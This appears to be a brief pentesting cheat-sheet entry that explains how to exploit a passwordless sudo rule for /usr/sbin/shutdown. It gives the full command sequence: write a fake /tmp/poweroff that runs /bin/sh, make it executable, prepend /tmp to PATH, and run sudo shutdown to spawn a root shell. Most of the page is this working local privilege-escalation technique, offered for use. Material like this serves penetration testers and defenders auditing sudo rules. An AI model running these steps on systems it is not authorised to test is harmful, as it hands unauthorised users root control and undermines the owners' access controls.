Sudo Shutdown, Poweroff Privilege Escalation

Sudo shutdown command might be vulnerable to privilege escalation (PrivEsc).

sudo -l

(ALL) NOPASS: /usr/sbin/shutdown
Copied!

If we can execute "shutdown" command as root, we can gain access to privileges by overwriting the path of "poweroff".

First create /tmp/poweroff binary which invoke a shell.

echo /bin/sh > /tmp/poweroff
# or
echo /bin/bash > /tmp/poweroff
Copied!

Then change permissions of the file and add "/tmp" folder to PATH.

chmod +x /tmp/poweroff
export PATH=/tmp:$PATH
Copied!

Now execute "shutdown" as root.

# Some SUID command
sudo /usr/sbin/shutdown

# Then you are root user
root>
Copied!

/tmp/poweroff is executed and spawn a root shell.

Last updated 2 years ago